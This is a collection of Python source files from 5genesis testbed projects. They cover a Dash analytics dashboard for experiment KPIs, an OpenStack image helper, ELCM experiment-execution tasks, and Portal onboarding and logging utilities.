feature = kpi[i]
series = df[feature]
series.reset_index(drop=True, inplace=True)
traces.append(go.Scatter(
x=df.index,
y=series,
mode='lines',
name=feature,
yaxis=f"y{i+1}" if i > 0 else 'y'
))
figure = {
'data': traces,
'layout': {
'title': 'Time Series',
'xaxis': {
'title': 'Samples',
'domain': [0, 1 - (len(kpi) - 1) * 0.06],
'titlefont': {
'family': 'Helvetica, monospace',
'size': 20,
'color': '#7f7f7f'
}
},
'yaxis': {
'title': kpi[0],
'titlefont': {
'family': 'Helvetica, monospace',
'size': 20,
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[0]
},
'tickfont': {
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[0]
}
},
"showlegend": False
}
}
for i in range(1, len(kpi)):
figure['layout'][f'yaxis{i+1}'] = {
'title': kpi[i],
'titlefont': {
'family': 'Helvetica, monospace',
'size': 20,
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[i]
},
'tickfont': {
'color': plotly.colors.DEFAULT_PLOTLY_COLORS[i]
},
'overlaying': 'y',
'side': 'right',
'position': 1 - i * 0.06
}
print(f"-- update_graph: {datetime.now()-start}", flush=True)
return figure
###
# Statistical Analysis tab
###
# callback used to store the statistical analysis dataframes
@app.callback(
[Output("it_stat_df", "children"),
Output("test_case_stat_df", "children")],
[Input('kpi', 'value'),
Input('datasource', 'value'),
Input('tabs', 'value')],
[State('measurement', 'value'),
State('experiment', 'value')])
def retrieve_stats(kpi, datasource, tab, measurement, experiment):
if not kpi or not experiment or tab != 'stat-analysis-tab':
empty_df = pd.DataFrame(data={})
return empty_df.to_json(), empty_df.to_json()
else:
link = f'http://statistical_analysis:5003/statistical_analysis/{datasource}'
param_dict = {
'experimentid': experiment,
'kpi': kpi[0], # .replace(" ","%20")
'measurement': measurement
}
r = requests.get(link, params=param_dict)
data = r.json()
if not data['experimentid'][experiment]:
return pd.DataFrame().to_json(), pd.DataFrame().to_json()
temp = data['experimentid'][experiment][kpi[0]]
df1 = pd.DataFrame.from_dict(temp['Iteration Statistics'], orient='index').reset_index()
test_case_stat_df = pd.DataFrame.from_dict(temp['Test Case Statistics'], orient='index').reset_index()
df1.rename(columns={'index': 'Iteration'}, inplace=True)
test_case_stat_df.rename(columns={'index': 'Indicator'}, inplace=True)
return df1.to_json(), test_case_stat_df.to_json()
# return box plot
@app.callback(
Output('box_plot', 'figure'),
[Input('kpi', 'value'),
Input("tabs", "value")],
[State("df", "children")])
def update_box_plot_graph(kpi, tab, df):
if not kpi or not df or tab != 'stat-analysis-tab':
return empty_fig
else:
kpi = kpi[0]
df = pd.read_json(df)
it_list = None
if '_iteration_' in df:
it_list = df._iteration_.unique()
if it_list is None or len(it_list) < 2:
return empty_figure(title='<b style="color:red">Warning: No iteration recorded in the data!</b>')
N = len(df._iteration_.unique()) + 1
c = ['hsl(' + str(h) + ',50%' + ',50%)' for h in np.linspace(0, 360, N)]
trace = []
for it in range(len(it_list)):
temp = df[df._iteration_ == it]
trace.append(go.Box(y=temp[kpi], name=f'{it}', marker_color=c[it]))
figure = {
'data': trace,
'layout': {
'title': 'Per-Iteration Statistics',
'xaxis': dict(
title='Iteration',
tickmode='array',
tickvals=list(range(N)),
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
)),
'yaxis': dict(
title=kpi,
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
)),
"showlegend": False
}
}
return figure
# return test case statistics table
@app.callback(
Output('table', 'data'),
[Input('test_case_stat_df', 'children'),
Input("tabs", "value")])
def update_table(test_case_stat_df, tab):
if not test_case_stat_df or len(test_case_stat_df) == 2 or tab != 'stat-analysis-tab':
return [{'Indicator': None, 'Value': None, 'Confidence Interval': None}]
else:
df = pd.read_json(test_case_stat_df)
return df.to_dict('records')
# # callback used to return the download link for the raw data
# @app.callback([
# Output('download-link', 'href'),
# Output('download-link', 'download')],
# [Input('df', 'children'),
# Input('datasource', 'value'),
# Input("tabs", "value")],
# [State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link_raw(df, datasource, tab, measurement, experiment):
# if not df or len(df) == 2 or tab != 'stat-analysis-tab':
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(df)
# csv_string = dff.to_csv(index=False, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'raw_{datasource}_{experiment}_{measurement}.csv'
# return csv_string, download_string
# # callbacks to return download links for statistical analysis
# @app.callback([
# Output('iteration_download', 'href'),
# Output('iteration_download', 'download')],
# [Input('it_stat_df', 'children'),
# Input('kpi', 'value'),
# Input('datasource', 'value'),
# Input("tabs", "value")],
# [State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link_stat_data(it_stat_df, kpi, datasource, tab, measurement, experiment):
# if not it_stat_df or len(it_stat_df) == 2 or tab != 'stat-analysis-tab':
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(it_stat_df)
# csv_string = dff.to_csv(index=False, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'per_it_stats_{datasource}_{experiment}_{measurement}_{kpi}.csv'
# return csv_string, download_string
# # callbacks to return download links for test case
# @app.callback([
# Output('test_case_download', 'href'),
# Output('test_case_download', 'download')],
# [Input('test_case_stat_df', 'children'),
# Input('kpi', 'value'),
# Input('datasource', 'value'),
# Input("tabs", "value")],
# [State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link_test_case(test_case_stat_df, kpi, datasource, tab, measurement, experiment):
# if not test_case_stat_df or tab != 'stat-analysis-tab':
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(test_case_stat_df)
# csv_string = dff.to_csv(index=False, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'test_case_stats_{datasource}_{experiment}_{measurement}_{kpi}.csv'
# return csv_string, download_string
###
# Correlation tab
###
###
# Field Correlation sub tab
###
# correlation matrix callback
@app.callback(
Output('correlation_graph', 'figure'),
# Output('corr_matrix_download_data', 'children'),
[Input('outlier', 'value'),
Input('measurement', 'value'),
Input("tabs", "value"),
Input("corr-tabs", "value"),
Input('kpi', 'value'),
Input('correlation-method', 'value')],
[State('experiment', 'value'),
State('datasource', 'value')])
def correlation_matrix(outlier, measurement, tab, corr_tab, kpis, correlation_method, experiment, datasource):
if not measurement or not outlier or tab != "correlation-tab" or corr_tab != "cross-correlation-tab":
return empty_fig
start = datetime.now()
link = f'http://correlation:5001/correlate/fields/{datasource}/{experiment}'
param_dict = {
'measurement': measurement,
'field': kpis,
'remove_outliers': outlier,
'method': correlation_method
}
r = requests.get(link, params=param_dict)
data = r.json()
df = pd.DataFrame(data['correlation_matrix']).select_dtypes(exclude=object).dropna(how='all')
x = df.columns
y = df.index[::-1]
z = df.values[::-1]
figure = {
'data': [
{
'type': 'heatmap',
'x': x,
'y': y,
'z': z,
'zmin': -1,
'zmax': 1,
'colorscale': [[0, 'red'], [0.5, 'white'], [1.0, 'green']]
}
],
'layout': {
'title': '<b>Correlation Matrix</b><br>Mouseover to read the exact data (x and y labels with corresponding correlation weight).',
'margin': {'l': 250, 'r': 250, 'b': 120}, # margin to avoid label cut - hardcoded because 'auto' doesn't work
'height': max(450, 20 * len(x))
},
'frames': []
}
# download_data = pd.DataFrame(temp).to_json()
print(f"-- correlation_matrix: {datetime.now()-start}", flush=True)
return figure
# return figure, download_data
# # download link for correlation matrix data
# @app.callback(
# [Output('corr_matrix_download', 'href'),
# Output('corr_matrix_download', 'download')],
# [Input('corr_matrix_download_data', 'children'),
# Input("tabs", "value"),
# Input("corr-tabs", "value")],
# [State('datasource', 'value'),
# State('measurement', 'value'),
# State('outlier', 'value'),
# State('experiment', 'value'),
# ])
# def update_download_link_correlation(corr_matrix_download_data, tab, corr_tab, datasource, measurement, outlier, experiment):
# if not corr_matrix_download_data or tab != "correlation-tab" or corr_tab != "cross-correlation-tab":
# csv_string = None
# download_string = None
# else:
# df_temp1 = pd.read_json(corr_matrix_download_data)
# df_temp2 = df_temp1.dropna(how='all') # drop rows where all elements are empty
# df = df_temp2.dropna(axis=1, how='all') # drop columns where all elements are empty
# csv_string = df.to_csv(index=True, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'correlation_matrix_data_{datasource}_{experiment}_{measurement}_{outlier}.csv'
# return csv_string, download_string
###
# Cross experiment correlation sub tab
###
# callback to return experiment2 ID options
@app.callback(
Output('experiment2', 'options'),
[Input('experiment', 'value'),
Input('experiment', 'options'),
Input("corr-tabs", "value")],
[State("tabs", "value")])
def find_second_experimentID(experiment, experiments, corr_tab, tab):
if experiment and experiments and tab == "correlation-tab" and corr_tab == "experiment-correlation-tab":
return experiments
else:
return []
# return correlation table
@app.callback(
Output('correlation_table', 'data'),
# Output('corr_table_download_data', 'children')],
[Input('outlier', 'value'),
Input('experiment', 'value'),
Input('experiment2', 'value'),
Input('measurement', 'value'),
Input('kpi', 'value'),
Input('datasource', 'value'),
Input("tabs", "value"),
Input("corr-tabs", "value")],
[State('correlation-method', 'value')])
def update_experiment_correlation_table(outlier, experiment, experiment2, measurement, kpis, datasource, tab, corr_tab, correlation_method):
if not experiment2 or not measurement or tab != "correlation-tab" or corr_tab != "experiment-correlation-tab":
correlation_list = []
# download_data = None
else:
if measurement is not None:
link = f'http://correlation:5001/correlate/experiments/{datasource}/{experiment}/{experiment2}'
param_dict = {
'measurement': measurement,
'field': kpis,
'remove_outliers': outlier,
'method': correlation_method
}
r = requests.get(link, params=param_dict)
if r.status_code != 200:
return []
data = r.json()
temp = data['correlation_list']
correlation_list = []
for k, v in temp.items():
if not pd.isna(v):
correlation_list.append({'Correlation Field': k, 'Value': v})
# download_data = pd.DataFrame(correlation_list).to_json()
return correlation_list
# return correlation_list, download_data
# # download link for correlation table data
# @app.callback(
# [Output('corr_table_download', 'href'),
# Output('corr_table_download', 'download')],
# [Input('corr_table_download_data', 'children'),
# Input('datasource', 'value'),
# Input('measurement', 'value'),
# Input('outlier', 'value'),
# Input('experiment', 'value'),
# Input('experiment2', 'value'),
# Input('kpi', 'value'),
# Input("tabs", "value"),
# Input("corr-tabs", "value")])
# def update_download_link_experiment_correlation(corr_table_download_data, datasource, measurement, outlier, experiment, experiment2, kpi, tab, corr_tab):
# if not corr_table_download_data or tab != "correlation-tab" or corr_tab != "experiment-correlation-tab":
# csv_string = None
# download_string = None
# else:
# df_temp = pd.read_json(corr_table_download_data)
# df = df_temp.reset_index(drop=True) # sets rows in increasing order
# csv_string = df.to_csv(index=True, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'correlation_table_data_{datasource}_{experiment}_{experiment2}_{measurement}_{kpi}_{outlier}.csv'
# return csv_string, download_string
###
# Feature Selection tab
###
# Drop feature dropdown list
@app.callback(
Output('drop_features', 'options'),
[Input('kpi', 'value'),
Input("tabs", "value")],
[State('df', 'children')])
def update_drop_features(kpi, tab, df):
# input check
if not df or not kpi or tab != "feature-selection-tab": # len(df) <= 0 or kpi == None:
return []
start = datetime.now()
df = pd.read_json(df).select_dtypes(exclude=object).dropna(how='all', axis=1)
print(f"-- update_table: {datetime.now()-start}", flush=True)
return [{'label': i, 'value': i} for i in df.drop(kpi, 1).columns]
# return bar plot of features importance
@app.callback([
Output('feature_bar', 'figure'),
Output('feature_score', 'children')],
[Input('kpi', 'value'),
Input("tabs", "value"),
Input("outlier", 'value'),
Input('method', 'value'),
Input("drop_features", "value"),
Input('normalize', 'value'),
Input('alpha', 'value')],
[State('datasource', 'value'),
State('measurement', 'value'),
State('experiment', 'value')])
def update_featureselection_graph(kpi, tab, outlier, method, drop_features, normalize, alpha, datasource, measurement, experiment):
if not kpi or not experiment or not measurement or not alpha or tab != "feature-selection-tab":
return empty_fig, None
start = datetime.now()
kpi = kpi[0]
kpi = kpi.replace(" ", "%20")
link = f'http://feature_selection:5004/selection/{datasource}/{method}/{kpi}'
param_dict = {
'experimentid': experiment,
'remove_outliers': outlier,
'alpha': alpha,
'normalize': normalize,
'drop_feature': drop_features,
'measurement': measurement
}
r = requests.get(link, params=param_dict)
data = r.json()['Score']
df = pd.DataFrame.from_dict(data, orient='index')
if sum(df[0]) == 0:
title = "<b>Feature selection cannot be performed on this feature since it is constant over time.</b><br>Running the same analysis with no outlier detection (set to 'None') may solve this issue for some of the features in the dataset."
else:
title = "Score"
figure = {
'data': [go.Bar(
y=list(data.values()),
x=list(data.keys())
)],
'layout': {
'title': title,
'xaxis': dict(
title='Features',
tickangle=30,
tickfont=dict(family='Rockwell', size=10),
titlefont=dict(
family='Helvetica, monospace',
size=16,
color='#7f7f7f'
))
}
}
print(f"-- update_featureselection_graph: {datetime.now()-start}", flush=True)
return figure, df.to_json()
# # callback which returns download link for feature scores
# @app.callback([
# Output('features_download', 'href'),
# Output('features_download', 'download')],
# [Input('feature_score', 'children'),
# Input('kpi', 'value'),
# Input('method', 'value'),
# Input("tabs", "value")],
# [State('datasource', 'value'),
# State('measurement', 'value'),
# State('experiment', 'value')])
# def update_download_link(feature_score, kpi, method, tab, datasource, measurement, experiment):
# if not feature_score or len(feature_score) == 2 or tab != "feature-selection-tab":
# csv_string = None
# download_string = None
# else:
# dff = pd.read_json(feature_score)
# csv_string = dff.to_csv(index=True, encoding='utf-8')
# csv_string = "data:text/csv;charset=utf-8," + urllib.parse.quote(csv_string)
# download_string = f'test_case_stats_{datasource}_{experiment}_{measurement}_{kpi}_{method}.csv'
# return csv_string, download_string
###
# Prediction tab
###
# Train button, which saves the model training results in a hidden Div
@app.callback(
[Output("prediction_results_df", "children"),
Output('model_download_link', 'href')],
[Input("train_button", 'n_clicks')],
[State('datasource', 'value'),
State('algorithm', 'value'),
State('kpi', 'value'),
State('experiment', 'value'),
State('drop_features_pred', 'value'),
State('drop_features_pred', 'options'),
State('measurement', 'value'),
State("outlier", "value"),
State('time_resolution', 'value'),
State("tabs", "value")])
def train_model(train_button, datasource, algorithm, target, experimentid, drop_features, drop_features_available, measurements, remove_outliers, time_resolution, tab):
if not datasource or not algorithm or not target or not experimentid or not measurements or tab != "prediction-tab":
return None, None
if drop_features and len(drop_features_available) == len(drop_features): # This happens when all features are selected for dropping and none remain
return None, None
target = target[0].replace(' ', '%20')
start = datetime.now()
param_dict = {
'experimentid': experimentid,
'drop_feature': drop_features,
'measurement': measurements,
'remove_outliers': remove_outliers,
'max_lag': time_resolution
}
r = requests.get(f'http://prediction:5002/train/{datasource}/{algorithm}/{target}', params=param_dict)
results = r.json()
print(f"-- train_model: {datetime.now()-start}", flush=True)
return json.dumps(results), f"/prediction/model/{algorithm}"
# Populate drop feature dropdown list
@app.callback(
Output('drop_features_pred', 'options'),
[Input('kpi', 'value'),
Input("tabs", "value")],
[State('df', 'children')])
def update_drop_features_prediction(kpi, tab, df):
if not df or not kpi or tab != "prediction-tab":
return []
start = datetime.now()
df = pd.read_json(df).select_dtypes(exclude=object).dropna(how='all', axis=1)
print(f"-- update_table: {datetime.now()-start}", flush=True)
return [{'label': i, 'value': i} for i in df.drop(kpi, 1).columns]
# Run feature selection for the prediction by pressing the drop feature button
@app.callback(
Output('drop_features_pred', 'value'),
[Input('drop_features_button', 'n_clicks')],
[State('datasource', 'value'),
State('method', 'value'),
State('kpi', 'value'),
State('experiment', 'value'),
State('outlier', 'value'),
State('alpha', 'value'),
State('normalize', 'value'),
State('measurement', 'value'),
State('drop_features_pred', 'options')])
def select_features_for_prediction(drop_features_button, datasource, method, kpi, experiment, outlier, alpha, normalize, measurements, all_features):
if not datasource or not kpi or not experiment or not measurements or not all_features:
return None
kpi = kpi[0] # .replace(' ', '%20')
all_features = [item['value'] for item in all_features]
selected_features = []
link = f'http://feature_selection:5004/selection/{datasource}/{method}/{kpi}'
param_dict = {
'experimentid': experiment,
'remove_outliers': outlier,
'alpha': alpha,
'normalize': normalize,
'measurement': measurements
}
r = requests.get(link, params=param_dict)
data = r.json()
selected_features = data['Features - Selected']
return [item for item in all_features if item not in selected_features]
# Results table
@app.callback(
Output('prediction_result_table', 'data'),
[Input("prediction_results_df", "children")],
[State("tabs", "value")])
def update_prediction_results_table(prediction_results_df, tab):
if not prediction_results_df or tab != 'prediction-tab':
return [{'Metric': None, 'Value': None}]
else:
results = json.loads(prediction_results_df)
return [{'Metric': k, 'Value': v} for k, v in results['results'].items() if k in [
'Cross-val R2 score (mean)',
'Cross-val explained_variance score (mean)',
'Explained variance score',
'Mean Absolute Error',
'Mean Squared Error',
'Prediction mean',
'Prediction std',
'R2 score',
'Test mean',
'Test std',
'Train mean',
'Train std']]
# Actual vs predicted graph
@app.callback(
Output('predicted_values_graph', 'figure'),
[Input("prediction_results_df", "children")],
[State("tabs", "value"),
State('kpi', 'value')])
def update_prediction_graph(prediction_results_df, tab, kpi):
if not prediction_results_df or tab != 'prediction-tab':
return empty_fig
start = datetime.now()
results = json.loads(prediction_results_df)
figure = {
'data': [go.Scatter(x=[float(item) for item in results['real_predicted_values']['y_test'].values()],
y=[float(item) for item in results['real_predicted_values']['y_pred'].values()],
name=kpi[0],
mode='markers')],
'layout': {
'title': f'Predicted vs actual values for {kpi[0]}',
'xaxis': dict(
title='Actual',
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
)),
'yaxis': dict(
title='Predicted',
titlefont=dict(
family='Helvetica, monospace',
size=20,
color='#7f7f7f'
))
}
}
print(f"-- update_prediction_graph: {datetime.now()-start}", flush=True)
return figure
# Coefficients table
@app.callback(
Output('prediction_coefficient_table', 'data'),
[Input("prediction_results_df", "children")],
[State("tabs", "value")])
def update_prediction_coefficients_table(prediction_results_df, tab):
if not prediction_results_df or tab != 'prediction-tab':
return [{'Feature': None, 'Value': None}]
else:
results = json.loads(prediction_results_df)
return [{'Feature': k, 'Value': v} for k, v in results['coefficients'].items()]
@app.server.route('/prediction/model/<string:algorithm>')
def download_model(algorithm):
model = requests.get('http://prediction:5002/model').content
return send_file(
BytesIO(model),
mimetype='application/octet-stream',
as_attachment=True,
attachment_filename=algorithm + '.pickle'
)
def get_secret():
try:
with open("/run/secrets/analytics_secret", 'r') as secret_file:
return secret_file.read().strip()
except IOError:
return None
if __name__ == '__main__':
secret = get_secret()
decoder = Crypt(secret=secret)
app.run_server(host='0.0.0.0', port=5005, debug=False)
``` |
{
"source": "5genesis/Dispatcher",
"score": 2
} |
#### File: mano/libs/openstack_util.py
```python
import openstack
import os
class OSUtils():
def connection(auth_url, region, project_name, username, password):
return openstack.connect(
auth_url=auth_url,
project_name=project_name,
username=username,
password=password,
user_domain_name="Default",
project_domain_name="Default",
)
def upload_image(conn, f, disk_format="raw", container_format="bare"):
# Build the image attributes and upload the image.
filename_without_extension, file_extension = os.path.splitext(f)
image_attrs = {
'name': filename_without_extension,
'filename': f,
'disk_format': disk_format,
'container_format': container_format,
# 'visibility': 'public',
}
return conn.image.create_image(**image_attrs)
def import_image(conn):
# Url where glance can download the image
uri = 'https://download.cirros-cloud.net/0.4.0/' \
'cirros-0.4.0-x86_64-disk.img'
# Build the image attributes and import the image.
image_attrs = {
'name': 'prueba_borrar',
'disk_format': 'qcow2',
'container_format': 'bare',
'visibility': 'public',
}
image = conn.image.create_image(**image_attrs)
conn.image.import_image(image, method="web-download", uri=uri)
def list_images(conn):
for image in conn.image.images():
print(image)
``` |
{
"source": "5genesis/ELCM",
"score": 2
} |
#### File: Tasks/Run/cli_execute.py
```python
from Task import Task
from Helper import Cli
class CliExecute(Task):
def __init__(self, logMethod, parent, params):
super().__init__("CLI Execute", parent, params, logMethod, None)
def Run(self):
parameters = self.params['Parameters']
cwd = self.params['CWD']
cli = Cli(parameters, cwd, self.logMethod)
cli.Execute()
```
#### File: Tasks/Run/publish_from_source.py
```python
from Task import Task
from Helper import Level
from typing import Dict
import re
class PublishFromSource(Task):
def __init__(self, name, parent, params, logMethod):
super().__init__(name, parent, params, logMethod, None)
def Run(self):
self.Log(Level.INFO, f'Running task {self.name} with params: {self.params}')
filePath = self.params.get("Path", None)
pattern = self.params.get("Pattern", None)
keys = self.params.get("Keys", None)
if pattern is None:
self.raiseConfigError("Pattern")
if keys is None:
self.raiseConfigError("Keys")
else:
self.Log(Level.DEBUG, f"Looking for pattern: '{pattern}'; Assigning groups as:")
try:
for index, key in keys:
self.Log(Level.DEBUG, f" {index}: {key}")
except Exception as e:
raise RuntimeError(f"Invalid 'Keys' definition: {e}")
regex = re.compile(pattern)
for line in self.generator({"Path": filePath}):
match = regex.match(line)
if match:
self.Log(Level.INFO, f"Match found: {match.string}")
for index, key in keys:
self.Publish(key, match.group(index))
def generator(self, params: Dict):
raise NotImplementedError()
def raiseConfigError(self, variable: str):
raise RuntimeError(f"'{variable}' not defined, please review the Task configuration.")
class PublishFromPreviousTaskLog(PublishFromSource):
def __init__(self, logMethod, parent, params):
super().__init__("Publish From Previous Task Log", parent, params, logMethod)
def generator(self, params: Dict):
logMessages = self.parent.Params["PreviousTaskLog"]
for message in logMessages:
yield message
class PublishFromFile(PublishFromSource):
def __init__(self, logMethod, parent, params):
super().__init__("Publish From File", parent, params, logMethod)
def generator(self, params: Dict):
filePath = params["Path"]
if filePath is None:
self.raiseConfigError("Path")
with open(filePath, 'r', encoding='utf-8') as file:
for line in file:
yield line
```
#### File: Tasks/Run/publish.py
```python
from Task import Task
from Helper import Level
from time import sleep
class Publish(Task):
def __init__(self, logMethod, parent, params):
super().__init__("Publish", parent, params, logMethod, None)
def Run(self):
for key, value in self.params.items():
self.Publish(key, value)
```
#### File: Tasks/Run/single_slice_creation_time.py
```python
from Task import Task
from Interfaces import Management
from Helper import Level
from time import sleep
from datetime import datetime
class SingleSliceCreationTime(Task):
def __init__(self, logMethod, parent, params):
super().__init__("Single Slice Creation Time Measurement", parent, params, logMethod, None)
def Run(self):
executionId = self.params['ExecutionId']
waitForRunning = self.params['WaitForRunning']
timeout = self.params.get('Timeout', None)
sliceId = self.params['SliceId']
count = 0
if waitForRunning:
self.Log(Level.INFO, f"Waiting for slice to be running. Timeout: {timeout}")
while True:
count += 1
status = Management.SliceManager().Check(sliceId).get('status', '<SliceManager check error>')
self.Log(Level.DEBUG, f'Slice {sliceId} status: {status} (retry {count})')
if status == 'Running' or (timeout is not None and timeout >= count): break
else: sleep(1)
self.Log(Level.INFO, f"Reading deployment times for slice {sliceId}")
times = Management.SliceManager().Time(sliceId)
self.Log(Level.DEBUG, f"Received times: {times}")
self.Log(Level.INFO, f"Generating results payload")
from Helper import InfluxDb, InfluxPayload, InfluxPoint # Delayed to avoid cyclic imports
payload = InfluxPayload("Single Slice Creation Time")
payload.Tags = {'ExecutionId': str(executionId)}
point = InfluxPoint(datetime.utcnow())
for key in ["Slice_Deployment_Time", "Placement_Time", "Provisioning_Time"]:
value = times.get(key, "N/A")
if value != "N/A":
point.Fields[key] = float(value)
payload.Points.append(point)
self.Log(Level.DEBUG, f"Payload: {payload}")
self.Log(Level.INFO, f"Sending results to InfluxDb")
InfluxDb.Send(payload)
# TODO: Artificial wait until the slice is 'configured'
# TODO: In the future the slice manager should also report this status
sleep(60)
```
#### File: ELCM/Experiment/execution_tombstone.py
```python
from Helper import Serialize
from Executor import Executor
from .experiment_run import CoarseStatus
class Tombstone:
def __init__(self, id: str):
path = Serialize.Path('Execution', id)
data = Serialize.Load(path)
self.Id, self.Cancelled, status = Serialize.Unroll(data, 'Id', 'Cancelled', 'CoarseStatus')
self.Params = {'Id': self.Id, 'Deserialized': True}
self.CoarseStatus = CoarseStatus[status]
self.PreRunner = Executor.Load('PreRunner', str(self.Id))
self.Executor = Executor.Load('Executor', str(self.Id))
self.PostRunner = Executor.Load('PostRunner', str(self.Id))
self.Created = Serialize.StringToDate(data['Created'])
self.JsonDescriptor = data.get('JsonDescriptor', {})
self.Milestones = data.get('Milestones', [])
self.RemoteId = data.get('RemoteId', None)
```
#### File: ELCM/Experiment/variable_expander.py
```python
from typing import Dict, Union
from .experiment_run import ExperimentRun
from Executor import ExecutorBase
from re import finditer
from Helper import Config
from json import dumps
class Expander:
@classmethod
def ExpandDict(cls, dict: Dict, context: Union[ExecutorBase, ExperimentRun]):
config = Config()
return cls.expandParams(dict, context, config)
@classmethod
def expandParams(cls, item: object, context: Union[ExecutorBase, ExperimentRun], config: Config) -> object:
if isinstance(item, dict):
res = {}
for key, value in item.items():
res[key] = cls.expandParams(value, context, config)
elif isinstance(item, list) or isinstance(item, tuple):
res = []
for value in item:
res.append(cls.expandParams(value, context, config))
elif isinstance(item, str):
res = cls.expand(item, context, config)
else:
res = item
return res
@classmethod
def expand(cls, item: str, context: Union[ExecutorBase, ExperimentRun], config: Config) -> str:
duration = context.Descriptor.Duration or 0
replacements = {
# Dynamic values
"@{TempFolder}": context.TempFolder,
"@{ExecutionId}": context.ExecutionId,
"@{SliceId}": context.Params.get("SliceId", "None"),
"@{Application}": context.Descriptor.Application,
"@{JSONParameters}": dumps(context.Descriptor.Parameters, indent=None),
"@{ReservationTime}": duration,
"@{ReservationTimeSeconds}": duration * 60,
# Configuration values
"@{TapFolder}": config.Tap.Folder,
"@{TapResults}": config.Tap.Results,
}
expanded = item
for key, value in replacements.items():
expanded = expanded.replace(key, str(value))
# Expand custom values published by Run.Publish and parameters
for match in [m for m in finditer(r'@\[(.*?)]', item)]:
all = match.group()
capture = match.groups()[0]
if ':' in capture:
key, default = capture.split(':')
else:
key = capture
default = '<<UNDEFINED>>'
collection = None
group = None
if '.' in key:
group, key = key.split('.')
if group == "Params":
collection = context.Descriptor.Parameters
elif group == "Publish":
collection = context.params
else:
collection = context.params
value = collection.get(key, default) if collection is not None else f'<<UNKNOWN GROUP {group}>>'
expanded = expanded.replace(all, str(value))
return expanded
``` |
{
"source": "5genesis/Portal",
"score": 2
} |
#### File: Portal/Helper/action_handler.py
```python
from .child import Child
from typing import Dict, Optional
from config import Config
from os.path import join, abspath, exists
from os import remove
class Action(Child):
def __init__(self, service, type: str, vnfd, token):
super().__init__(f"{service.id}_{type}")
self.service = service # type: "NetworkService"
self.type = type
self.vnfd = vnfd # type: "VnfdPackage"
self.token = token
self.message = "Init"
self.result = None
def Run(self):
try:
handler = getattr(self, self.type)
handler()
except Exception as e:
self.hasFailed = True
self.message = f"Error: {e}"
def onboardVim(self):
from REST import DispatcherApi
filePath = abspath(join(Config.UPLOAD_FOLDER, *self.service.VimLocalPath, self.service.vim_image))
vimName = self.service.vim_name
self.message = f"VIM Image onboarding in progress"
maybeError = DispatcherApi().OnboardVim(filePath, vimName, self.token, self.service.is_public)
if maybeError is None:
self.result = "<onboarded>" # Not a known ID but a value to signal it's been onboarded
self.message = f"VIM Image successfully onboarded"
else:
raise RuntimeError(f"Exception during onboarding process: {maybeError}")
def onboardNsd(self):
from REST import DispatcherApi
filePath = abspath(join(Config.UPLOAD_FOLDER, *self.service.NsdLocalPath, self.service.nsd_file))
self.message = f"NSD file onboarding in progress"
maybeId, success = DispatcherApi().OnboardNsd(filePath, self.token, self.service.is_public)
if success:
self.result = maybeId
self.message = f"NSD file successfully onboarded"
else:
raise RuntimeError(f"Exception during onboarding process: {maybeId}")
def onboardVnf(self):
from REST import DispatcherApi
filePath = abspath(join(Config.UPLOAD_FOLDER, *self.vnfd.VnfdLocalPath, self.vnfd.vnfd_file))
self.message = f"VNFD package onboarding in progress"
maybeId, success = DispatcherApi().OnboardVnfd(filePath, self.token, self.service.is_public)
if success:
self.result = maybeId
self.message = f"Onboarded VNFD with id: {maybeId}"
else:
raise RuntimeError(f"Exception during onboarding process: {maybeId}")
def deleteVim(self):
if self.service.vim_id is not None:
self.message = "Deletion of onboarded VIM images is not supported"
else:
self.message = "Deleting VIM image"
self._deleteLocalFile(self.service.VimLocalPath, self.service.vim_image)
self.message = "Deleted VIM image from temporal storage"
def deleteNsd(self):
if self.service.nsd_id is not None:
self.message = "Deletion of onboarded NSD is not supported"
else:
self.message = "Deleting NSD file"
self._deleteLocalFile(self.service.NsdLocalPath, self.service.nsd_file)
self.message = "Deleted NSD file from temporal storage"
def deleteVnf(self):
if self.vnfd.vnfd_id is not None:
self.message = "Deletion of onboarded VNFDs is not supported"
else:
self.message = "Deleting VNFD package"
self._deleteLocalFile(self.vnfd.VnfdLocalPath, self.vnfd.vnfd_file)
self.message = "Deleted VNFD package file from temporal storage"
def _deleteLocalFile(self, path, file):
filePath = abspath(join(Config.UPLOAD_FOLDER, *path, file))
if exists(filePath):
remove(filePath)
def __str__(self):
return f"Action: {self.name} (St:{self.hasStarted}, Ed:{self.hasFinished}, Fail:{self.hasFailed})"
class ActionHandler:
collection: Dict[int, Action] = {}
@classmethod
def Get(cls, id: int) -> Optional[Action]:
return cls.collection.get(id, None)
@classmethod
def Set(cls, id: int, action: Action) -> None:
if id in cls.collection.keys():
from .log import Log
Log.W(f"Adding duplicated key to active Actions ({id}), overwritting existing: {cls.collection[id]}")
cls.collection[id] = action
@classmethod
def Delete(cls, id: int) -> None:
_ = cls.collection.pop(id)
```
#### File: Portal/Helper/log.py
```python
import logging
import traceback
from enum import Enum, unique
from dataclasses import dataclass
from typing import Union, List, Dict, Tuple
from flask import Flask
from os import makedirs
from os.path import exists, join
from logging.handlers import RotatingFileHandler
from .config import Config
import sys
class ColoredFormatter(logging.Formatter):
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
RESET_SEQ = '\033[0m'
COLOR_SEQ = '\033[1;%dm'
COLORS = {
'WARNING': YELLOW,
'INFO': WHITE,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': MAGENTA
}
def format(self, record):
if record.levelname in self.COLORS:
color_levelname = self.COLOR_SEQ \
% (30 + self.COLORS[record.levelname]) \
